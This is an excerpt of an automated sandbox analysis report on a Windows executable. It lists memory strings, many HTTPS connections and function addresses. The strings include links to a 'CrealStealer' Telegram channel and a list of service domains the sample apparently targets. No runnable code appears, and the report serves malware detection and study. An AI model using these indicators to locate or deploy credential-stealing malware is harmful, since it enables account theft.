            Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/CrealStealer
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/CrealStealer2
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A830000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808788736.000002539A830000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1810105340.000002539A831000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806437691.000002539A830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
            Source: HyZh4pn0RF.exe, 00000002.00000003.1807654238.000002539A382000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790955383.000002539A34C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793434238.000002539A5FB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2FE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811309519.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811817866.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821619779.000002539A5FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1825189021.000002539B2E2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805946201.000002539A5FC000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809054810.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790429949.000002539A2FD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788652033.000002539B2CE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807578063.000002539A35A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
            Source: HyZh4pn0RF.exe, 00000002.00000003.1812755836.000002539B1B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809487444.000002539B1AF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791039518.000002539B1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
            Source: HyZh4pn0RF.exe, 00000002.00000003.1813334396.000002539A88E000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811638590.000002539A88E000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809820155.000002539A86C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A830000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787579799.000002539A86B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1815848973.000002539A890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000003.1796799317.000002539A94D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791344985.0000025399E41000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1794230363.0000025399E5C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788452258.0000025399E01000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789039772.0000025399E3B000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788827650.000002539A948000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791228515.000002539A94C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1806888317.000002539A951000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808692623.000002539A952000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1823091900.000002539A952000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790369328.0000025399E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uber.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000002.1823330103.000002539A999000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788973339.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807987225.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808509453.000002539A997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
            Source: HyZh4pn0RF.exe, 00000002.00000003.1786935489.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789185298.000002539A8DE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1797612204.000002539A8E0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498852357.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787535604.000002539A8D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498140465.000002539B1C5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500555282.000002539A8B2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1497976070.000002539A987000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1822917552.000002539A8E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824991617.000002539B29B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
            Source: HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1833750878.00007FFBAABDA000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: HyZh4pn0RF.exe, 00000002.00000003.1808967495.000002539A9D0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1797847362.000002539A9CB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A996000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787476794.000002539A9CA000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805386780.000002539A9CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
            Source: HyZh4pn0RF.exe, 00000002.00000003.1796799317.000002539A95A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500341869.000002539A92C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788827650.000002539A948000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1786519721.000002539A946000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1808079169.000002539A95A000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791228515.000002539A94C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1809402925.000002539A95C000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500185747.000002539A997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1818871820.0000025399CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: HyZh4pn0RF.exe, 00000002.00000002.1834739735.00007FFBAB16C000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1834045763.00007FFBAAFF4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B396000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1785802132.000002539B390000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784800845.000002539B395000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784057520.000002539B388000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784529385.000002539B38D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: HyZh4pn0RF.exe, 00000002.00000003.1785215448.000002539B396000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784800845.000002539B395000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784057520.000002539B388000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1784529385.000002539B38D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0
            Source: HyZh4pn0RF.exe, 00000002.00000003.1810591741.000002539B335000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813019488.000002539B329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
            Source: HyZh4pn0RF.exe, 00000002.00000003.1805597702.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1816988653.000002539A250000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793990847.000002539A244000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1810651244.000002539A800000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1811757531.000002539A245000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790671676.000002539A21F000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787795082.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789691864.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813743625.000002539A250000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1792428869.000002539A240000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1820200234.000002539A250000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1795287489.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791160404.000002539A239000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790549834.000002539A20A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
            Source: HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
            Source: HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A0F380_2_00007FF78F4A0F38
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F497E4C0_2_00007FF78F497E4C
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A63700_2_00007FF78F4A6370
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A72BC0_2_00007FF78F4A72BC
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4879500_2_00007FF78F487950
